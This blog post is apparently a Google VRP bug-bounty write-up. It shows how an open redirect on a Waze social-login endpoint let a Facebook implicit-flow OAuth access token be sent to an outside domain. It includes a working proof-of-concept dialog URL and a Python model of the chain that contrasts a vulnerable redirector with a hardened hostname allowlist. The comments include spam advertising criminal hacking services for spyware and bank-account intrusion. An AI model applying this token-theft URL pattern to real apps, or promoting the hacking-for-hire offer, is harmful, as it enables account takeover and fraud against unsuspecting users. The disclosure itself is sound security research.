Google VRP: OAuth token stealing.

Hey guys! Hope you are all doing well :). In June/July I decided to hunt on Google products. As Google has almost everything in scope, I went through the list of Google products and fully integrated acquisitions ( https://www.google.com/intl/en/about/products/ ). Waze is one of Google's fully integrated acquisitions (there is a difference between integrated and non-integrated acquisitions under the VRP rules), so I decided to give it a try :)

I was looking at the Waze iOS app and there was an option to log in with Twitter, so I started capturing requests. The URL looked like this:

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxxx

(not exactly this; I was too lazy to check it again :P)

The flow works in the same manner as the OAuth 2.0 `Authorization Code flow`: Twitter uses OAuth 1.0a, which has no `Implicit flow` (as far as I know), so the browser only ever sees an `oauth_verifier` that the server must exchange, together with its consumer secret, for the real access token.

1 - GET request to http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx

2 - 302 response to https://api.twitter.com/oauth/authorize?oauth_token=xxxxx&redirect_uri=http://www.waze.com/SocialMediaServer/redirect?redirect=http://somdomain.waze.com%3Fsession_cookies=xxxx&server=this&publish=false&on_close=false&community=twitter&lang=&deviceid=0&is_group=false

3 - After authorizing, redirect to http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3Fsession_cookies=xxxx%26oauth_token%3Dxxx%26oauth_verifier=xxxxx

4 - And then finally redirect to http://somdomain.waze.com/twitter?session_cookies=xxxx&oauth_token=xxx&oauth_verifier=xxxxx

Everyone can see what is suspicious here: the redirect endpoint takes its final destination from a query parameter; http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3Fsession_cookies=xxxx%26oauth_token%3Dxxx%26oauth_verifier=xxxxx

Luckily, yes, it was vulnerable to open redirect, so we had already won the battle :D. But wait: what we get back from Twitter is the `oauth_verifier`, which is not very usable from an attacker's perspective (it is worthless without the app's consumer secret and the matching request token, and it is single-use). Also, Twitter's /oauth/authorize endpoint makes the user authorize the app every time :/

Looking at the `id` parameter in http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx, it seemed that more social connections were possible, so I checked the Android app as well and found that Facebook and LinkedIn are also there. I started testing on Android; the Facebook flow there was completely different. So I started fuzzing around the old URL and tried replacing twitter with facebook.

GET Request - http://www.waze.com/SocialMediaServer/social/connect?id=facebook&session_cookies=xxx

Response - 500 Error :(

But wait, I have seen many apps use the pattern /social/<connection_name>/connect, so let's give that a try.

GET - http://www.waze.com/SocialMediaServer/social/facebook/connect?id=twitter&session_cookies=xxx

Response - 302 :DDDDD



In the Facebook dialog URL that the 302 pointed to, I changed the inner ?redirect= parameter to http://harshjaiswal.com and set response_type=token,signed_request, so that Facebook returns the access token directly in the URL fragment instead of an authorization code.

Final PoC :

https://m.facebook.com/v2.8/dialog/oauth?auth_type=rerequest&client_id=343050668156&default_audience=friends&redirect_uri=https://waze.com/SocialMediaServer/redirect?redirect=http://harshjaiswal.com&response_type=token,signed_request&return_scopes=true&scope=email,user_friends,user_events


Response -
http://harshjaiswal.com/?redirect=http://harshjaiswal.com#granted_scopes=user_events%2Cuser_friends%2Cemail%2Cpublish_actions%2Cpublic_profile&denied_scopes=&signed_request=XXXXXXX&access_token=EAAAATXXXXX&expires_in=6886

Facebook appends the token to the fragment of redirect_uri, and the browser keeps that fragment across the 302 from waze.com to harshjaiswal.com because the Location header carries no fragment of its own. So the attacker's page can read the victim's access_token from location.hash, while Facebook's redirect_uri check was satisfied by the waze.com prefix (an exact-match redirect URI allowlist on the Facebook app side would also have stopped this).
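The chain above, modelled in code. This is an added example written for this page, not the author's PoC and not Waze or Facebook code: it simulates Facebook's dialog for a user who has already consented, the waze.com redirect endpoint in its vulnerable form (reflecting any `redirect=` value) next to an assumed hardened form (https only, exact-match host allowlist), and a browser that follows 302s the way real browsers do, carrying the current URL's fragment onto a Location that has none. The demo token, the allowlisted hosts and all handler functions are constructed for the example; only the endpoint path, client_id and attacker domain come from the post.

```python
"""Model of the open-redirect -> implicit-flow token theft described above.
Added example for this page; not the author's PoC and not Waze/Facebook code.
Everything except the endpoint path, client_id and attacker domain is constructed."""
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

ATTACKER = "http://harshjaiswal.com"                          # from the post
REDIRECTOR = "https://waze.com/SocialMediaServer/redirect"     # from the post
DEMO_TOKEN = "EAAAATXXXXX"                                     # constructed placeholder
ALLOWED_HOSTS = {"www.waze.com", "somedomain.waze.com"}        # assumed allowlist


def redirector_url(target):
    """Build REDIRECTOR?redirect=<target> with the target properly encoded."""
    return REDIRECTOR + "?" + urlencode({"redirect": target})


def waze_redirect_vulnerable(url):
    """The bug: whatever ?redirect= says is echoed straight into Location."""
    target = parse_qs(urlsplit(url).query).get("redirect", [""])[0]
    return 302, target


def waze_redirect_hardened(url):
    """Assumed fix: only absolute https URLs whose parsed hostname is allowlisted.
    Comparing .hostname (not a string prefix) defeats '//evil.com',
    'https://waze.com@evil.com' and 'https://somedomain.waze.com.evil.com'."""
    target = parse_qs(urlsplit(url).query).get("redirect", [""])[0]
    parts = urlsplit(target)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        return 400, None
    return 302, target


def facebook_dialog(url):
    """Models m.facebook.com/dialog/oauth for a user who already consented.
    With response_type=token the token goes into the *fragment* of redirect_uri."""
    q = parse_qs(urlsplit(url).query)
    if "token" not in q.get("response_type", [""])[0].split(","):
        raise NotImplementedError("only the implicit flow is modelled here")
    fragment = urlencode({"access_token": DEMO_TOKEN, "expires_in": "6886"})
    return 302, q["redirect_uri"][0] + "#" + fragment


def browser_follow(url, handlers, max_hops=10):
    """Follow 302s like a browser: a Location without a fragment inherits the
    fragment of the URL being redirected from (RFC 7231 s.7.1.2). That rule is
    what carries the token from waze.com to the attacker's origin.
    Returns (status, final_url)."""
    for _ in range(max_hops):
        current = urlsplit(url)
        handler = handlers.get(current.hostname)
        if handler is None:            # not a modelled server: the page simply loads here
            return 200, url
        status, location = handler(url)
        if status != 302:
            return status, url
        loc = urlsplit(location)
        if not loc.fragment and current.fragment:
            location = urlunsplit(loc._replace(fragment=current.fragment))
        url = location
    raise RuntimeError("too many redirects")


def build_poc(attacker_url=ATTACKER):
    """Attacker's dialog URL: redirect_uri stays on waze.com (so Facebook's
    redirect_uri check passes) while its own ?redirect= points at the attacker."""
    params = {
        "client_id": "343050668156",                 # from the post
        "redirect_uri": redirector_url(attacker_url),
        "response_type": "token,signed_request",
        "scope": "email,user_friends,user_events",
    }
    return "https://m.facebook.com/v2.8/dialog/oauth?" + urlencode(params)


def run(redirector):
    """Play the chain with the given waze.com handler.
    Returns (final status, final hostname, token readable by the attacker or None)."""
    handlers = {"m.facebook.com": facebook_dialog, "waze.com": redirector}
    status, final = browser_follow(build_poc(), handlers)
    host = urlsplit(final).hostname
    token = parse_qs(urlsplit(final).fragment).get("access_token", [None])[0]
    leaked = token if host == urlsplit(ATTACKER).hostname else None
    return status, host, leaked


if __name__ == "__main__":
    print("vulnerable:", run(waze_redirect_vulnerable))   # token lands on harshjaiswal.com
    print("hardened:  ", run(waze_redirect_hardened))     # chain stops at waze.com with 400
```

Running it shows the vulnerable redirector delivering the token fragment to harshjaiswal.com and the hardened one stopping the chain at waze.com with a 400. The allowlist check compares the parsed hostname rather than a string prefix, which is why `//evil.com`, `https://waze.com@evil.com` and `https://somedomain.waze.com.evil.com` are all rejected; a prefix check such as `target.startswith("https://waze.com")` would let the userinfo variant through.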


Although Waze is a fully integrated acquisition, I got a smaller bounty :P because the VRP still treats it as an acquisition for bounty purposes :(


But it's okay! At least I learned one thing: if they don't give you an endpoint, try to guess it 3:)

I hope you liked it. :)



2 comments:

  1. I DONT KNOW WHAT YOU HAVE BEEN THROUGH OR HOW LONG YOU HAVE BEEN LOOKING BUT THIS IS THE LAST STOP AS THERE IS A HACKER WHO CAN HELP YOU WITH SPY WARE ON YOUR CHEATING PARTNER OR UPGRADE YOUR SCHOOL SCORES OR HELP WITH RESULT AND CLEAR ANY CRIMINAL RECORD..

    HACKING OF FACEBOOK , EMAIL , AND BANK ACCOUNTS ARE HIS SPECIALTY.. EMAIL : GREENFR1007@GMAIL.COM OR SKYPE:SATISH.ANCHAN4

    BEST EVER


  2. Tank cleaning company in Medina, with trained workers who hold health certificates. Just call us to get the best tank cleaning service.


